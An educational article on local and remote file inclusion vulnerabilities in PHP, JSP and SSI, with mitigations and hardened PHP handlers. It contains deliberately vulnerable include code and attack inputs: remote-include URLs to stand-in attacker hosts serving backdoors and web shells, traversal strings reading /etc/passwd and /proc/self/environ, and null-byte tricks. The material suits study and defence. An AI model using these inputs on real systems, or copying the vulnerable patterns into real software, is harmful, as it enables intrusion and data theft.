File Inclusion Vulnerability P1

File inclusion vulnerabilities allow attackers to read and execute files on a server by exploiting web applications that improperly handle user input for file uploads. These vulnerabilities can be categorized into Local File Inclusion (LFI) and Remote File Inclusion (RFI), with each type posing distinct risks and methods of exploitation. Mitigation strategies include proper input validation, sanitization, and restricting file upload permissions to prevent unauthorized access and execution of malicious files.

File Inclusion Vulnerabilities: What are File Inclusion Vulnerabilities?

File Inclusion vulnerabilities often affect web applications that rely on a scripting runtime, and occur when a web application allows users to submit input into files or upload files to the server. They are often found in poorly written applications.

File Inclusion vulnerabilities allow an attacker to read and sometimes execute files on the victim server or, as is the case with Remote File Inclusion, to execute code hosted on the attacker's machine.

An attacker may use remote code execution to create a web shell on the server, and use that web shell for website defacement.

Types of file inclusion vulnerabilities:

File inclusion vulnerabilities come in two types, depending on the origin of the included file:

– Local File Inclusion (LFI)

– Remote File Inclusion (RFI)

Local File Inclusion (LFI)

A Local File Inclusion attack is used to trick the application into exposing or running files on the server. It allows attackers to execute arbitrary commands or, if the server is misconfigured and running with high privileges, to gain access to sensitive data.

These attacks typically occur when an application uses the path to a file as input. If the application treats that input as trusted, an attacker can use the local file in an include statement.

While Local File Inclusion and Remote File Inclusion are very similar, an attacker using LFI may include only local files.

Local File Inclusion (LFI) Example

<?php
/**
 * Get the filename from a GET input
 * Example - http://example-website.com/?file=filename.php
 */

$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - filename.php
 */
include('directory/' . $file);

In the example above the attacker's intent is to trick the application into executing a PHP script, such as a web shell:

http://example-website.com/?file=../../uploads/malicious.php

Once a user runs the web application, the file uploaded by the attacker will be included and executed. This will allow the attacker to run any server-side code that he wants.

Learn more about local file inclusion attacks – https://www.neuralegion.com/blog/local-file-inclusion-lfi/

Remote File Inclusion (RFI)

An attacker who uses Remote File Inclusion targets web applications that dynamically reference external scripts. The goal of the attacker is to exploit the referencing function in the target application and to upload malware from a remote URL, located on a different domain.

The results of a successful RFI attack can be information theft, a compromised server and a site takeover, resulting in content modification.

Remote File Inclusion (RFI) Example

This example illustrates how Remote File Inclusion attacks work:

A Java Server Pages page containing the following code:

<jsp:include page="<%= (String) request.getParameter("ParamName") %>" />

can be manipulated with the following request:

Page1.jsp?ParamName=/WEB-INF/DB/password

After the application processes the request, it will reveal the content of the password file.

The application has an import statement that requests content from a URL address:

<c:import url="<%= request.getParameter("conf") %>" />

The same input statement can be used for malware injection if the statement is unsanitized. For example:

Page2.jsp?conf=https://evil-website.com/attack.js

An attacker will often launch a Remote File Inclusion attack by manipulating the request parameters so that they refer to a remote, malicious file.

For example, consider the following code:

$incfile = $_REQUEST["file"];
include($incfile . ".php");

$incfile = $_REQUEST["file"]; – extracts the file parameter value from the HTTP request.

include($incfile . ".php"); – uses that value to dynamically set the filename.

If you don't have proper sanitization in place, this code can be exploited, resulting in unauthorized file uploads.

For example, this URL string: http://www.example-website.com/vulnerable_page.php?file=http://www.attacker.com/backdoor contains an external reference to a backdoor file stored in a remote location (http://www.attacker.com/backdoor_shell.php).

Once uploaded to the application, this uploaded backdoor can be later used to hijack the server or gain access to the application database.

RFI prevention and mitigation

To minimize the risk of RFI attacks, proper input validation and sanitization has to be implemented. Ensure you don't fall victim to the misconception that all user inputs can be fully sanitized. Look at sanitization only as an addition to a dedicated security solution.

Sanitize the user-supplied or user-controlled input as best you can, including:

– HTTP header values
– URL parameters
– Cookie values
– GET/POST parameters

Check the input fields against a whitelist. An attacker can supply input in a different format (encoded or hexadecimal formats) and bypass a blacklist.

Client-side validation comes with the benefit of reduced processing overhead, but it is vulnerable to attacks by proxy tools, so apply the validation on the server end.

Make sure you restrict execution permissions for the upload directories, maintain a whitelist of acceptable file types, and restrict upload file sizes.
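The last three controls (a file-type whitelist, a size limit and an upload location that is never executed) as a PHP upload handler, added here as an illustration and not taken from the original page or from any project it describes. UPLOAD_DIR and the accepted types are assumptions; the handler still depends on the web server being configured not to execute anything stored in that directory.

```php
<?php
// Added example, not from the original page: an upload handler applying the
// three controls listed above. UPLOAD_DIR is an assumed path outside the web
// root; the web server must additionally be configured not to execute anything
// stored there.
declare(strict_types=1);

const UPLOAD_DIR    = '/srv/app-data/uploads';   // assumption: never served as code
const MAX_BYTES     = 2 * 1024 * 1024;            // upload size limit (2 MiB)
const ALLOWED_TYPES = [                           // detected MIME type => stored extension
    'image/png'       => 'png',
    'image/jpeg'      => 'jpg',
    'application/pdf' => 'pdf',
];

// Validates one $_FILES entry and returns the stored path, or null if rejected.
// Neither the client-supplied file name nor its declared type is trusted: the
// type is detected from the content and the name is generated server-side.
function storeUpload(array $upload): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($upload['size'] > MAX_BYTES || !is_uploaded_file($upload['tmp_name'])) {
        return null;                     // too large, or not a real upload
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($upload['tmp_name']);
    if ($detected === false || !isset(ALLOWED_TYPES[$detected])) {
        return null;                     // e.g. a PHP web shell renamed to .png
    }
    // Random, server-chosen name: the uploader cannot predict or control the path.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$detected];
    if (!move_uploaded_file($upload['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0640);                // readable by the application, never executable
    return $target;
}

$stored = isset($_FILES['upload']) ? storeUpload($_FILES['upload']) : null;
http_response_code($stored === null ? 400 : 201);
```

Content sniffing alone does not stop a polyglot file that is both a valid image and valid PHP, which is why the random name and the non-executable directory are kept even after the type check passes.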

File inclusion vulnerabilities in common programming languages with examples

File inclusion in PHP

The main cause of File Inclusion vulnerabilities in PHP is the use of unvalidated user input with a filesystem function that includes a file for execution, most notably the include and require statements. In PHP 5.x the allow_url_include directive is disabled by default, but be cautious with applications written for older PHP versions, because before 5.x allow_url_include was enabled by default.

The goal of the attacker is to alter a variable that is passed to one of these functions, to cause it to include malicious code from a remote resource.

To mitigate the risk of File Inclusion vulnerabilities in PHP, make sure all user input is validated before it is used by the application.

Example of a File Inclusion vulnerability in PHP

<?php
if (isset($_GET['language'])) {
    include($_GET['language'] . '.php');
}
?>

<form method="get">
  <select name="language">
    <option value="english">English</option>
    <option value="french">French</option>
  </select>
  <input type="submit">
</form>

The developer intended to read in english.php or french.php, which will alter the application's behavior to display the language of the user's choice. But it is possible to inject another path using the language parameter.

For example:

/vulnerable.php?language=http://evil.example.com/webshell.txt? – injects a remotely hosted file containing malicious code (remote file include)

/vulnerable.php?language=C:\\ftp\\upload\\exploit – executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)

/vulnerable.php?language=C:\\notes.txt%00 – example using the NULL metacharacter to remove the .php suffix, allowing access to files other than .php. Note, this use of null byte injection was patched in PHP 5.3, and can no longer be used for LFI/RFI attacks.

/vulnerable.php?language=../../../../../etc/passwd%00 – allows an attacker to read the contents of the /etc/passwd file on a Unix-like system through a directory traversal attack.

/vulnerable.php?language=../../../../../proc/self/environ%00 – allows an attacker to read the contents of the /proc/self/environ file on a Unix-like system through a directory traversal attack. An attacker can modify an HTTP header (such as User-Agent) in this attack to be PHP code to exploit remote code execution.

The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation, such as a whitelist, cannot be used, then rely upon input filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined switch/case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path.
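A hardened counterpart to the vulnerable.php language switcher above, which also replaces the `include($incfile . ".php")` pattern from the RFI section. This is an added example, not code from the original page or from any project it describes; it assumes the language files live in a lang/ directory beside the script, and the containment fallback is for cases where a fixed allowlist is impractical.

```php
<?php
// Added example, not from the original page: a hardened replacement for the
// vulnerable.php language switcher. The lang/ directory and its file names
// are assumptions.
declare(strict_types=1);
const LANG_DIR = __DIR__ . '/lang';

// Preferred defence named in the text: a fixed switch/case maps the parameter
// to a file name, so no part of the request ever reaches include().
function languageFile(string $language): ?string
{
    switch ($language) {
        case 'english': return LANG_DIR . '/english.php';
        case 'french':  return LANG_DIR . '/french.php';
        default:        return null;     // unknown value: reject, never build a path
    }
}

// Fallback when the set of files is not fixed: canonicalise the request and
// require that it resolves inside the base directory. Null bytes and scheme
// prefixes are refused first, so ../../etc/passwd%00, http://evil.example.com/...
// and C:\\notes.txt%00 from the list above are all rejected.
function containedPath(string $baseDir, string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;                     // http:, ftp:, php:, C: ...
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;                     // missing file or unresolvable path
    }
    // The resolved file must lie strictly below the resolved base directory.
    return strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $path : null;
}
// Defence in depth: refuse to serve while allow_url_include is still On.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}
$file = languageFile((string) ($_GET['language'] ?? 'english'));
if ($file === null) {
    http_response_code(400);
    exit('unsupported language');
}
include $file;
```

If the allowlist cannot be used, swap the languageFile() call for containedPath(LANG_DIR, $language); realpath() returning false for a non-existent or traversed-out path is what makes the check fail closed.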

Java Server Pages (JSP)

Java Server Pages (JSP) is a scripting language which can include files for execution at runtime.

Example of a File Inclusion vulnerability in JSP

<%
String p = request.getParameter("p");
@include file="<%= "includes/" + p + ".jsp" %>"
%>

/vulnerable.jsp?p=../../../../var/log/access.log%00 – Unlike PHP, JSP is still affected by null byte injection, and this parameter will execute JSP commands found in the web server's access log.

Server Side Includes (SSI)

Although a Server Side Include is uncommon and not typically enabled on a default web server, it can be used to gain remote code execution on a vulnerable web server.

Example of a File Include vulnerability in SSI

The following code is vulnerable to a remote-file inclusion vulnerability:

<!DOCTYPE html>
<html>
<head>
<title>Test file</title>
</head>
<body>
<!--#include file="USER_LANGUAGE"-->
</body>
</html>

The above code is not an XSS vulnerability, but rather includes a new file to be executed by the server.
